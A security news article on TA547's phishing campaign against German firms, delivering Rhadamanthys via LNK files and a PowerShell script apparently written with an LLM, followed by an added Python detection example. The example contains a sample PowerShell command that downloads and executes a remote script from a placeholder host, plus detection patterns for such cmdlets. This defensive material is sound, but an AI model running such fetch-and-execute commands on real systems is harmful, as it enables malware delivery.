Threat actor TA547 has been observed targeting German organizations with the known information stealer Rhadamanthys.
According to a recent report from Proofpoint, this is the first time this threat actor has been associated with such activity.
What the researchers found particularly intriguing is the actor’s apparent use of a PowerShell script likely generated by a large language model (LLM) such as ChatGPT, Gemini or Copilot.
Posing as the well-known German retail company Metro, TA547 sent invoice-themed emails. The emails, sent to numerous organizations across different industries in Germany, contained a password-protected ZIP file holding an LNK file.
When executed, the LNK file launched PowerShell to run a remote script, which ultimately loaded and ran the Rhadamanthys malware directly in system memory, avoiding the need to write it to disk.
Notably, the PowerShell script exhibited characteristics unusual for code written by a typical threat actor or by a legitimate programmer, suggesting possible LLM involvement. These included grammatically correct and hyper-specific comments above each component of the script, a hallmark of LLM-generated content.
This campaign showcases a shift in TA547’s tactics, including the adoption of compressed LNK files and the introduction of Rhadamanthys. It also highlights how threat actors are incorporating suspected LLM-generated content into their malicious efforts.
However, according to Proofpoint, while malicious actors can use LLMs to understand complex attack chains and potentially improve their campaigns, this does not change the functionality or effectiveness of the malware. In fact, the company believes that most behavior-based detection mechanisms remain effective regardless of the malware’s origin.
“In the same way that phishing emails generated by LLMs to commit business email compromise (BEC) use the same characteristics as human-generated content and are detected by automated detections, malware or scripts that incorporate machine-generated code will continue to run the same way in a sandbox (or on a host), triggering the same automated defenses,” the company explained.
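The behavior-based point above can be made concrete: the chain described in the article (LNK opened from Explorer, PowerShell fetching a remote script and running it in memory) leaves the same process-creation footprint whether or not an LLM wrote the script. The following is an added example, not Proofpoint's detection logic or anything from the campaign; it scores constructed Sysmon-style process events, and the field names `image`, `parent` and `cmdline` are assumptions for this illustration.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style).
# These are NOT real telemetry from the TA547 campaign; hostnames are placeholders.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe",
     "cmdline": "explorer.exe"},
    # LNK double-clicked from Explorer -> PowerShell fetches and IEX's a remote script
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/stage.ps1')\""},
    # Benign admin usage: script on disk, launched from a console
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]

# Behavioral indicators of the LNK -> PowerShell -> remote script -> in-memory chain.
REMOTE_FETCH = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                          r"invoke-restmethod|\birm\b|net\.webclient|start-bitstransfer", re.I)
IN_MEMORY = re.compile(r"invoke-expression|\biex\b|frombase64string|-enc(odedcommand)?\b", re.I)
EVASION = re.compile(r"-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass|-nop(rofile)?\b", re.I)


def score_event(event):
    """Return (score, reasons) for one process-creation event.

    Each matched behavior adds one point; the parent/child relationship counts
    because an LNK launched from Explorer yields explorer.exe -> powershell.exe.
    """
    reasons = []
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, reasons
    if event["parent"].lower().endswith("explorer.exe"):
        reasons.append("powershell spawned by explorer.exe (consistent with LNK launch)")
    cmd = event["cmdline"]
    if REMOTE_FETCH.search(cmd):
        reasons.append("command line fetches remote content")
    if IN_MEMORY.search(cmd):
        reasons.append("command line executes content in memory")
    if EVASION.search(cmd):
        reasons.append("hidden window / execution-policy bypass flags")
    return len(reasons), reasons


def flag_suspicious(events, threshold=3):
    """Return indices of events whose behavioral score reaches the threshold."""
    return [i for i, e in enumerate(events) if score_event(e)[0] >= threshold]
```

Running `flag_suspicious(SAMPLE_EVENTS)` flags only the second event; the threshold keeps a lone download cmdlet or a hidden window from alerting on its own.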